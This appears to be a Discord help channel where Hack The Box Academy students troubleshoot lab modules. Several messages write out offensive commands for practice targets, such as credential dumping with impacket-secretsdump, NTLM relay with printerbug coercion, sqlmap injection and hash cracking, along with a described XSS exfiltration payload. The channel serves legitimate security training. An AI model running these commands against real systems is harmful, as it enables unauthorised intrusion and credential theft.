Need one more help I reached pivoting module ( m 11 ) in CPTS and till now there are 7 questions from different skill assessment and excercises which I don't able to complete after going crazy ! 🤯

Please anyone help me to complete them !

Try with dashes MM-DD-YYYY

I also changed the RegEx to match on MM/DD/YYYY as well

thank you for the help i tried that before, it seems that if you copy/paste the answer from terminal it is not acceptable. so i typed it 🙂

Maybe the - character wasn't exactly the same. Regardless, now works with slashes too.

yeah, just to mention it got accepted on US format MM/DD/YYYY if that is helpful to others

That's the format that PowerShell is providing it anyway, so it shouldn't be a problem.

ikr, anyways, thanks for jumpin in i appreciate it

Hey guys. I need some help. I'm working on network services in the Password Attack Module. It's taking forever on my machine via the vpn to crack the username and password especially using the netexec command. How do I get to use the networkresources.zip files in the pawnbox? It's suggested that using them in pawnbox will take lesser time.

You can find it in the first question, next to the Submit button.

Thank you. I wanted to know whether there's a way I can use the resources inside the pawnbox instead of my own machine through a vpn connection.

just download it with wget, followed by the link

can anyone give me a sanity check on skill assesment for advanced XSS and csrf exploitation? ||I Was able to send a payload that fetches the admin.php and sends the response to my server, when I click I can see the XSS working, but no other user is clicking, should any moderator or admin click it?||

Thank you. It worked.

Hacking wordpress - Login: "Search for "WordPress xmlrpc attacks" and find out how to use it to execute all method calls. Enter the number of possible method calls of your target as the answer."

Not sure what this question even mean and even less why it's here. Anyways, I want to do the whole module and earn my cubes, so I have to pass it. And also I'm kind of that person that wants to clear things and not skip things. I like the feeling of "being done" and not simply skipping and giving up.

But tbh, I'm not learning anyting from this, just makes me frustrated. Sorry, but this kind of questions are just silly and doesn't contribute to the overall experience. So please, just help me move on.

I just wanna be safe. And i am really scared, thatswhy I am looking for some to help me

This isn't that type of server

I dont mean to do search help for illegal things

Somebody here who wants to check the new season machine ? Im ready :)!

have a good day ❤️

Oh okay, im sorry. But do you know which Server I need to go?

I do not

For my situation

Okay, thank you

Where can i look for a team ? 🙂 or maybe some people who are often online 🙂

You can try #1318239802931286066

no permissions 😄

Then navigate to #welcome to get access and read over #rules

got it, thy buddy

Hi everyone,

I'm trying to request a TGT using the gettgtpkinit.py script from the PKINITtools on Hack The Box. I have a valid PFX certificate in Base64 format and I run the command like this:

python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$ -pfx-base64 <Base64PFXString> dc01.ccache

This indicates that the TGT request succeeded.

However, when I try a similar process on my own lab/environment, it fails and I get errors or no TGT is issued.

"KDC has no support for PADATA type (pre-authentication data)"

Sounds like an issue with the kdc not accepting pre-auth stuff

can we use mobaxterm to SSH into the boxes to answer questions in the module?

That question wants you to search for "quoted stuff" on the Internet and see if you can find something that explains how to execute those calls. At least that's how I interpreted it and was able to answer the question.

Hello Everyone. Im working on https://academy.hackthebox.com/module/136/section/1291 File Upload Attacks, Limited File Uploads. I think Ive figured out how to upload the malicious SVG, but I cant figure out how to view any output. Any help would be great! Im still trying to figure out Burp

on the module, theres a similar thing they do

you are on the right track, just try and take a look at the limited file uploads section again

Hi! Can I ask on DMs for sm1 to give me a little help on the Password Attacks module?

https://academy.hackthebox.com/module/147/section/1391

Simple wordlist: capitalize each keyword given.
Simple custom.rule: Also don't forget about adding characters at the end. See the linked hashcat rules page from the section

Yeah, I ended up using CuPP and it's not even working with that and it applies all that modifications

That's why I'm asking for help, I can throw all my process in case u find an issue on it or smth

You don't need to use cupp

Just a simple base list, and a simple custom.rule based on a few basic rules

I know but after SEVERAL days trying to do handmade I wasn't able so tried to use it.

I.e. adding special characters at the end

Or adding full stuff at the end such as a year

Quick question (and please tag me in the response): how can i revisit the content of a finished module in case I have forgotten to take notes/improve my notes of said module?

Go to module -> retake module. Your dashboard (not enterprise) lists all completed modules. You can utilize the search feature at the top as well

Okay, thank you very much!

As an example $! Adds "!" At the end of the affected word. I.e.
Word -> $! -> Word!

Hey, new to pentesting. Having trouble connecting to redis-cli. Any reason my VM cannot connect to it?

Starting Point, Redeemer

Wrong channel: #starting-point

Still exhausted :c

im struggling fr with this ffs

Dm me with your rule list

im using best64.rule

Write your own rule

Don't use a pre-made rule

alrighty ill try

It'll likely miss the exact thing needed

The hint button for the question is helpful to think of an additional rule or two to add

hey btw marcielee

doing server side skill assesment, im tryna get a connection to my machine but it dosent connect, am i on the wrong track or am i doing it incorrectly?

Hello

Don't think I've done that one

"Server-side Attacks "

oh well il try n see, ty!

Oka, and there is any way to generate all the possible combinations of my .list?

You don't need a fancy base wordlist before mutation

like, if my .list looks like
zaiden
marcie
lee

it generates

zaidenmarcie
marcielee
zaidenlee

and so

alrighty

Just make sure to capitalize the first letter of each word

didnt you finish the path already?

retaking it

taking cbbh soon, so yeah

im doing only skill assessments again

then you should know the answer to your question

honestly, i just forgot

its been a while

got it now though

Thats not how that works, you'd need to add some additional rules to add those in. But again. You don't need anything complex

make writeups for every exercise

Just did!

I'll give it another try, thanks for answering

If someone could DM me. I really could use some help. Im working on https://academy.hackthebox.com/module/136/section/1291 File Upload Attacks, Limited File Uploads. I think Ive figured out how to upload the malicious SVG, but I cant figure out how to view any output. Any help would be great! Im still trying to figure out Burp

Using repeater you should see the response

the only response Im seeing is "File successfully uploaded"

I used dirsearch and found where the files are being uploaded to, and there isnt any useable output

I just recall following the examples and it working as expected

can anyone please help me out: i am stuck on a sqli injection.
when I go to the URL: http://ip/index.php?id=' I get a sql error, so it is injectable. But the description says: Security is not a joke, and filtering is serious business.
So I guessed I needed to do some filtering, and It appears that the server removes spaces. Been trying to exploit this for hours with sqlmap but no luck.
Anyone can help me? Tried commands like: sqlmap --flush-session -u "http://ip/index.php?id=4" -p id --batch --random-agent --level=5 --risk=3 --dbms=mysql --tamper=space2comment,randomcase,between --technique=BEUT --time-sec=8

Hello

Thanks for a push in the right direction, now I figured out what they actually asked for and found the answer 👍

DM

Why I can't message in general I have a I need help

Read the #welcome instructions

Which module and section?

So I need to make a account In that site ?

Yes, this server deals with HackTheBox (and HackTheBox accessories)

@rustic sage we don't do that kind of hacking here.

No it's not hack

Well we don't do anything with Whatsapp

Also you don't have image permissions to send videos/images

Oh okay bro is there a place that I can get help from ?

This isn't a troubleshooting server. And this channel is specifically for help with the htb academy learning modules

Okay bro sorry for bothering you

Just ask WhatsApp support

Hey what would you guys do to find the default credit of prtg if u know the username prtgadmin, instead of just manually guessing the password

Google?

creds app is good too

This error is still happening. Does anyone have any thoughts?

guys, it's normal? i tried three different ways to connect using xfreerdp and i can't. but the machine receive my pings.
"Kerberoasting - from Windows (Module)"

Tack on /timeout:10000.

oh, you are a gentleman... works now

Looking at my notes from this, I didn't have any issues. I'll spin it up real quick and try it out again.

Thanks, I have a feeling I'm doing something stupid.

If you want to DM you can.

could anyone help me out on Web Attacks skill assesment

i found the IDOR but i cant do anything with it that i know off

Look at the previous sections again

i did

i cant find anything

who or where do i need to go about having issues with modules not loading?

<@&861185840277487616> ban the account mods?

do i need to ping seriousrulebreakagain?

HAH!

what happened guys

second time a scam server is promoted

dude just tried to scam me

pinged SRB a while ago and someone deleted the msg, i thought it was a mod

apperantly not

@visual cedar This account keeps promomting a scam server.

just check deleted msgs log

He's banned

alr

thanks

nooo la poliziaa noo

i thought a mod had deleted his msgs thats why i deleted the previous SRB ping i did

jajajajjaa

You should look at possibly enumerating possible users

i found the 52

i think i have an idea though

But seriously tho, i'm having issues trying to launch a pwn-box

who or where should i turn to?

Try CTRL+SHIFT+R or another browser, if it's truly a server side issue you'd need to reach out to support on the site.

rgr rgr

Have you tried changing the VPN server?

yarp

changing regions may help too

tried that as well

can you give me a hint

sometimes the "methods" you use matters.

good hint, but i tried all requests methods alr

i cant find the missing parameter

Not quite.

please do not reveal details of skill assessments

oh sorry

take it to DM if you feel you need to reveal info. anyone who has done these doesn't need exact answers like that they already know the answer.

i just want a hint

i dont want info

i did this 2 years ago i forget a lot

i understand but you don't need to reveal things from the assessment to ask a question

I sent a DM

Can I dm someone on “credential hunting in network shares"?

Can I ask a question here if I’m stuck on a question?

https://dontasktoask.com

so long as your question doesn't contain a bunch of spoilers for the module/section

The question doesn’t: The question is “How many total packages are installed on the target system?”

I used apt and we to count them but keep getting the wrong answer. Am I misunderstanding the question?

wc *

Did you take into account that not all lines outputted by apt is an installed package? some lines could be headers

i did not take that into account, but furthermore, i didnt see anything at all on the page that even mentions packages, so im spinning my wheels

That's illegal, please read #rules

wel apt has a way to list installed packages

also make sure you're ssh into the target when doing this exercise

i dont want to put the command here, but i used a very appropriate switch/flag to list the installed packages, but 0xW1LD mentioned that it would also include headers in the STDOUT

a way to check if their may be an extra header at the top would be to check with | head

im going through man pages now

so you can see the top 10 lines are

ah ok that makes sense

the warning message that apt gives you is part of stderr, not stdout, so it's not being counted

Attacking Common Services - Easy

Just Repeating the Modules:
The Target SMTP service goes offline after some minutes(confirmed this by scan).. have tried SMTP User enum with other methods as well

RCPT isn't always reliable, try other methods

also changing the timing is useful.

The module is aboove tier 0 so avoid sharing spoilers

have tried but same issue

the smtp service can be slow to respond, increasing the wait time can be useful

didn't work, tried just now

Needed Help in Password Attack Pass the Certificate

I got

impacket-secretsdump -k -no-pass -dc-ip 10.129.64.94 -just-dc-user Administrator 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[] Using the DRSUAPI method to get NTDS.DIT secrets
[-] 'NoneType' object has no attribute 'getRemoteHost'
[] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[] Cleaning up...

instead of getting NTDS.Dit secrects and dont know why

can u elaborate the issue, it's not clear.

have u export db.cache?

have u exported db.cache?

Thanks that's work.

yes I export the cache

In the initial step instead of getting ./DC01$.pfx file I got the base64

does it mght be a problem

but somehow i converted it to .pfx

openssl pkcs12 -export -out DC01$.pfx -inkey dc01.pem -in dc01.pem -passout pass:

you shouldn't have to convert anything to .pfx

Then how can i get the certificate

i am sure u have not followed the path completely

the ntlmrelay command should provide it to you

the ntlmrelayx command then the printerbug command

just gotta keep the ntlmrelayx command running

Remember make sure to export KRB5CCNAME=/tmp/dc.ccache outside of python env

after that it should be trivial to save the ccache file and follow from there

the ntlmrelayx command gives me base64 instead of DC01$.pfx

it shouldn't give you base64, the output you get from ntlmrelayx should tell you the file is saved as 'DC01\$.pfx'

I tried outside of python env but it gives me

impacket-secretsdump -k -no-pass -dc-ip 10.129.64.94 -just-dc-user Administrator 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[-] RemoteOperations failed: Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)
[*] Cleaning up...

pre-auth invalid
that means your ccache file isn't proper

My ntlmrelayx output

[] Generating CSR...
[] CSR generated!
[] Getting certificate...
[] GOT CERTIFICATE! ID 13
[*] Base64 certificate of user DC01$:
MIIRtQIBAzCCEW8GCSqGSIb3DQEHAaCCEWAEghF....

again it should be saving to a file, not sure why you're getting base64

hello has anyone completed " "XPath - Blind Exploitation""

thanks

if you do ls in the directory you launched ntlmerelayx from do you see a DC01$.pfx?

I think thats might be the problem
when I got that base64 i save it as .pem and somehow convert it to .pfx using opelssl

Resolve DC01 to ip work for me

you can use gettgtpkinit.py -pfx-base64 $(cat base64.txt) <domain>/DC01$ <output file> to get the TGT

source: https://github.com/dirkjanm/PKINITtools/blob/master/README.md#gettgtpkinitpy

music45 is right. You need to resolve the domain controller's ip to its hostname.

you mean this
10.129.64.94 DC01.INLANEFREIGHT.LOCAL DC01
to /etc/hosts

let me try

i'm curious what your command was for ntlmrelayx that got you the b64 output 🤔

instead of it saving to a file

I don't think the extra DC01 is neccesary at the end. Also the command requires you to have the correct KRB environment variable.

with windows and AD the DC01 is necessary

it's just how kerberos does things

It's different on Windows and Linux?

not entirely sure with linux domain joined machines but for kerberos it looks for both the FQDN and shortname

I see, it worked for me fine without the DC01 at the end, but maybe it was a special case.

thats my command

i didn't use sudo to run ntlmrelayx

^^

permission is denied without sudo in my case

hmm may be your environment then

Just tested it, does not require admin permissions. That is very strange.

I think so

I can’t figure out how to access the admin login on nibbles

Hey for anybody doing CBBH want to have a study partner? I’m pretty far into it and to be honest looking for someone else who isn’t a complete nub, but also struggling by themselves because their brain doesn’t do web very well like mine

follow the module closely

Also looking for any mentors out there that might want to help a brother out

For CBBH that already have it

Probably the wrong channel for this.

Not really it’s specifically for the modules

Or this only for help?

I may be confused on that as I haven’t used this section of the discord so my apologies if so

this channel is really only for help with the modules, not asking for study buddies

Gotcha would CBBH be more appropriate?

and even then study groups tend to not work out too well for this kinda thing due to it being a self-paced course

Yea but it doesn’t hurt to ask if someone else is looking. Would CBBH be a good spot or are these sections specifically for like technical support help?

That's illegal, can't help you, go talk to her about it or if you think it's needed go contact law enforcement

Hi

Yes I know sorry but this is the only Way.... I can pay if I need

No. That is not what this discord server is about.

Even if that were true ,don't ask for it in here, it's against the #rules

Wt I want read here to access genaral?

Read #welcome and follow instructions

Still redirecting to here

Didn’t follow the instructions then

Clicking and scrolling won’t do the trick. You gotta actually read and do as you’re told

Got it now

I want give my token

No. You do as you’re told in the instructions. Ain’t nobody here gonna be able to do it for you

Thanks man I will do it now

@fierce sable don't dm without asking first

Has anyone completed the final assessment for LLM Output Attacks? I have what seems like a reasonable payload but haven't been able to get it to work in places where I thought it might work. I could really use some advice! Thanks much!

Hi GUYS, anyone knows a guide on certipy covering all kinds of ESC attacks?

The documentation of the tool

https://github.com/ly4k/Certipy/wiki/06-‐-Privilege-Escalation

IF Juicy potato / printspoofer binaries dont launch , don't even get syntax etc even though a system is vulnerable , anyone have a good idea of where to go from there? all flags CLID etc are fine, don't even get an error

Still does not work. Same error. on the serverside I get:

025/06/24 06:51:28 server: session#1: tun: conn#1: Close [0/7] (error Failed to handle request: read tcp 172.16.5.129:54834->172.16.5.19:3389: read: connection reset by peer)

Hey i am doing AD enumeration and attack skill assesment II i am stuck in question to get flag.txt of MS01 i got creds but i dont seem to able to connect to it using evilwinrm or xfreerdp when ports are open

Submit the contents of the C:\flag.txt file on MS01.

Awesome thanks

Make sure the user you are trying to log in with is in the right group.

@fierce sable did you do the "pass the certificate" lab? I'm getting the same problem

i did, it smoothly, what's your problem?

I am working on 'Parameter Logic Bugs - PoC and Patching - Validation Logic Disparity'.
Here I followed the flow by sending a basic request through RapidAPI to 'http://localhost:5000/api/exams/availability'

{
    "id": 1,
    "startDate": "2025-06-24T15:47:14.843Z",
    "endDate": "2025-07-24T15:47:14.843Z"
}

Got error:
{
"unavailableSlots": []
}

But in the front-end I see available slots from 2025-06-24 up to 2025-07-24, so why not through RapidAPI?
The function should returns a list of unavailable dates but it does not. 'unavailableSlots' is empty.

Then I followed the 'Validation Logic Disparity' vulnerabilite steps
I set a breakpoint (line 166) right after the line where userId is set, and then send a request to the endpoint.
Then I did right-click on the userId variable and select Add to Watch

The I send a POST request to /api/exams/book with the same id/date body data we saw in the previous section.
{
"id": 1,
"date": "2025-07-24T15:47:14.843Z"
}

But at this endpoint it requires authentication, So I added the to the request, which we can copy from the storage tab in the Browser Dev Tools under Local Storage.
Then we can click on the token and select Copy Row or copy.
Authorization: Bearer <token>

Only this section I don't understand? I can not delete the 'token' word in RapidAPI but only in 'Dev Tools under Local Storage'
Then, in the RapidAPI request, we add it in the Auth tab with the Bearer option "make sure you delete the token word when you paste the value".

Can someone help me with this and also the patch that is provided did not work from the section 'PoC and Patching - Validation Logic Disparity'.

where to delete the word 'token'?

yo guys im on attacking AD

LLMNR/NBT-NS Poisoning - from Linux

im supposed to use responder to listen and send poisoned answers to services

and capture the ntlmv2 authentication request

however this hash cant be cracked with rockyou list

which, i think it should

also tried other wordlists, tried cracking with hashcat and john too

this is my setup

└─$ john/run/john --format=Netntlmv2 --wordlist=/opt/wordlists/rockyou.txt temphash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
0g 0:00:00:08 DONE (2025-06-24 11:16) 0g/s 1609Kp/s 1609Kc/s 1609KC/s !)(OPPQR..CjDC2x[U
Session completed. 

hashcat -m 5600 temphash /opt/wordlists/rockyou.txt

Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: BACKUPAGENT::INLANEFREIGHT:a1837c1bd036e5b2:85db804...bbe4db
Time.Started.....: Tue Jun 24 11:36:11 2025 (12 secs)
Time.Estimated...: Tue Jun 24 11:36:23 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/opt/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1142.8 kH/s (1.17ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344386/14344386 (100.00%)
Rejected.........: 0/14344386 (0.00%)
Restore.Point....: 14344386/14344386 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....:  kristenanne -> CjDC2x[U
Hardware.Mon.#1..: Temp: 60c Util: 76%

Started: Tue Jun 24 11:36:10 2025
Stopped: Tue Jun 24 11:36:25 2025

idk what im missing here

Somebody can help me to get back my mess?

Check whether you have new lines in the file

check

when i run -
impacket-secretsdump -k -no-pass -dc-ip 10.129.234.174 -just-dc-user Administrator '10.129.234.174/DC01$'@DC01.INLANEFREIGHT.LOCAL
I keep getting this error-
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)
[] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[] Cleaning up...

doing brute force module, the pin python script it's so mean making the pin not in the low number range... running for 20 mins on pwnbox and only up to 2820, or am i meant to ignore script and use burp but even thats slow on free edition

The part where you define DC01$, instead of the IP, shouldn't it be the domain name? so DOMAIN/DC01$ You are trying to log in with DC01$ account and using an IP as domain name

Yea i did that first

It was giving the same error

I'll boot up the lab, one moment, we can go to DM

Aight' 🤝🏻

Anyone done Intro to Whitebox Pentesting? How's the 2nd question of Skill Asssessment expecting us to throw an exception in NodeJS correctly? I've been trying to make it throw an error then exit, make it exit without throwing error, make it exit while loggin info, none works. Every method just shows patch failed. Why is the question so vague?
I can confirm it works correctly by testing locally with different inputs

Have you saved the dc01$ TGT using export KRB5CCNAME? Have you configured /etc/krb5.conf correctly?

Did you make sure you resolve the domain controller's IP to its hostname?

I get the exact same error, if I define the DC01.inlanefreight.local into hsots file, the error changes to invalid_checksum

Just finished the SQLi module. That skills assessment was super fun.
Can't wait to do SQLmap module and automate some stuff though, my lord

check if ur domain is in ur hostgs file

User error

The newest iteration of impacket-ntlmrelayx outputs the certificate in base64, but it can just be converted with base64 -d to pfx file

oof lol

Hey all. I'm working through the "NTLM Relay Attacks" module and am stuck at the Skills Assessment Q2. I've had a read online (https://forum.hackthebox.com/t/ntlm-relay-attacks-skills-assessment-question-2/303433/7) and searched HTB Discord. It appears that I should be trying the ESC attacks and have followed the steps but when attempting to run printerbug,pu, I'm getting the following error: "SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)". The printerbug.py command I'm using is: python3 tools/krbrelayx/printerbug.py inlanefreight/plaintext$:'password123!'@172.16.119.70 172.16.119.20 where 172.16.119.70 is the target (backup01) and 172.16.119.20 is the listener (attack box). I'm using the pwnbox. Any pointers as I'm pulling my hair out!

just outta curiosity what is the impacket version? mine is showing 0.12.0 (in pwnbox)

For me it's 0.11.0, I installed apt packages: python3-impacket impacket-examples

So it's not the newest iteration then, I assumed wrong 😄

when I installed with pip there were some errors regarding the ntlmrelayx component, it wanted an argument in the rpc function but there was no flag to set it and it was missing in the ntlmrelayx.py file itself

yeah the apt version may be behind the python repository version

It's working for me at 0.12. Maybe try that.

I'll have to demo a newer version on another machine, I just spent an hour trying to fix the toolset

I plan on taking the exam soon, so I cannot afford taking extra risks 😄

Make sure you have everything set up. Use the pwnbox if there are issues, good luck!

Will do, thanks!

I'll most likely do another blind run on the AEN and make a mock report

Can confirm that with 0.12 it creates a file

My original issue with the pip packet was that it requires sudo rights to run ntlmrelayx as it binds to a lower port, so I installed it with user and root seperately, because running as sudo the packet wouldn't be found even if it was in path

I also noticed that python version was missing GetUserSPNs.py, just a heads up if someone is using it

@sleek surge to be clear you're on the Knowledge Check section?

yes I am

don't reveal spoiler information for modules.

sry i did not know

the nmap module tells you that sometimes you need to connect to a port via netcat to get more information

can u help me with that

i tryed getting the banner but it did not print out any thing

also as noted by the info message at the top -sT is incompatible with -g (--source-port) option

you need to use -sS

ss is resulting in the service being tcprapped

yeah meaning that you'll need another method to gain information

nmap isn't a one-stop shop

nc?

im missing something,,

yes nc

anyone keep getting this error on windows server section of win priv esc

with nc, -p is the source port option

Exploit failed: Errno::EACCES Permission denied - bind(2) for 10.10.15.166:445
Interrupt: use the 'exit' command to quit]

permission denied

you need to run the exploit tool with sudo

as 445 is a reserved port (<1024)

as i said i did try that before i did not result anything ..

let me retry wait

remember source port is the port from your system being used to connect

when connecting to a remote resource the syntax is typically nc ip port

still stuck

thanks

it seems the base64 thing is because you're running an older version of impacket-ntlmrelayx

v0.11.0

the pwnbox uses v0.12.0

i tryed the nc 1.1.1.1(ip) 55(port) still nothing

nc ip targetport

you know the target port you want to connect to

you also need to specify the source port as well

with -p

okkkk

ntlmrelayx.py --version
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

I enabled printerbug.py verbose logging to try and get to the bottom of this issue, but the exception is the same. I'm unsure why the error is being generated as the target and listener IPs are correct I think. Has anyone else had the same issue here pls, or should I be looking at another technique? Thanks.

that error is expected, check your ntlmrelayx output

Just continuously says attacking and then times out

for this you simply swap the ip for printer bug and ntlmrelayx

also @grizzled schooner don't share passwords/info/spoilers 😉

Oh sorry, didn't realize it was still in there, my bad!

guys who has solved logrotate in linux priv escalation?

Guys, I am on module/113/section/1090 for the Tomcat Discovery. I am not sure how to figure out the answer of the 2nd question "What role does the admin user have in the configuration example?" Because I cannot seem to access or know how to access the tomcat-users.xml configuration file.

try restarting the ntlmrelayx command @grizzled schooner

On my 2nd restart for ntlmrelayx and the machine(s) in general --> was happening last night as well

module/section numbers mean nothing, it helps to give the module name and section name

keyword here is "example"

as in, what's in the reading

Thanks - Attacking Common Applications > Servlet Containers/Software Development > Tomcat Discovery and Enumeration

I'll let it run a bit longer, and see if it'll work this time around

Ohhhh I thought I was supposed to get the answer out of the running box

try copy/pasting the command directly from the module, to ensure no weird typos

in this case it specifically mentions "example"

I appreciate it, thank you!

be mindful that whenever a question asks for something from the example -> it's from the reading and not from the target

I will pay more attention next time

that's what I did lol

SMBD-Thread-5 (process_request_thread): Received connection from <DC01>, attacking target http://<DC01>

up to SMBD-Threat-12

Guys hello who has done Logrotate from Linux Priv Escalation

including the printerbug command

yeah

sometimes you gotta manually push the file to get it to update i.e. just add a line to the file to force it to update/rotate

I have from the reading

python3 printerbug.py <targetdomain>/user:"password"@DC01 <my ip>

Marcie did it. Can't make logrotten working

logrotten does work; it just takes a little coercion to make the file rotate for the logrotten payload

sudo nc 10.129.2.47 <port> -p 53
Can't grab 0.0.0.0:53 with bind
does this mean that my port 53 is being used? and if yes can i use 1053?

I created payload anyway found logs and transferred logrotten but when I start it, it tells me logrotten is a directory

when start from directory tells me there is no such file

will return to it later

you cannot use a different source port, yes that means port 53 is in use, typically dnsmasq

the only way is to free the 53

@west arrow please don't reveal module content. The best way to figure out what's breaking is to see where the payload is inserted

So after it hit SMBD-Thread-12 it timed out for ntlmxrelayx --> re-ran printerbug.py as root and ntlmrelayx with sudo, and I'm getting the same thing

Can anyone give me a nudge?

make sure you use the CA server for the ntlmrelayx command (the -t) option

Yeah im completely lost on this one, even if I copy and paste the code from the module it doesn't work

That's why --> I have that listed as dc01 from the module content

the examples and the excersize don't always line up 1to1

the module content specifies that in the examples the 10.x.x.110 is the CA server and the 10.x.x.109 is the DC01

(then you just need to swap them out for the spawned target servers)

so ntlmrelayx is ca and printerbug to dc01?

yep

if printerbug isn't working well, you can use really anything else

dfscoerce

coercer